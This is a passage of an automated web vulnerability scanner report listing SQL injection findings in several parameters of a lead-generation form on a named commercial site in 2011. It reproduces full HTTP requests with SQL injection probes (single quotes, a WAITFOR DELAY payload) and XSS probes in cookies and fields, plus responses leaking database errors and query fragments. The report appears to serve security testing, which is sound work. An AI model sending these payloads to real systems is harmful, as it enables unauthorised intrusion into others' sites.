1.122. http://www.insideup.com/ppc/leadflow/caad00/project.php [attributeId_401 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The attributeId_401 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_401 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999'&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:53:11 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ega4cm6uredshqpbj444k6eck0; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.123. http://www.insideup.com/ppc/leadflow/caad00/project.php [attributeId_402 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The attributeId_402 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_402 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months'&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:03:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 6790
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
</a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '000 - 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Comp' at line 5

Request 2

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months''&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:03:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.124. http://www.insideup.com/ppc/leadflow/caad00/project.php [attributeId_402 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The attributeId_402 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_402 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months'&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:53:16 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=8peu16fgi0ab1vf9qm5n04iuf3; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.125. http://www.insideup.com/ppc/leadflow/caad00/project.php [attributeId_403 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The attributeId_403 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_403 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999'&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:53:21 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ret7a2erkc0vssl8pt2cgrlrf4; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999'&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.126. http://www.insideup.com/ppc/leadflow/caad00/project.php [attributeId_403 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The attributeId_403 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_403 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999'&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
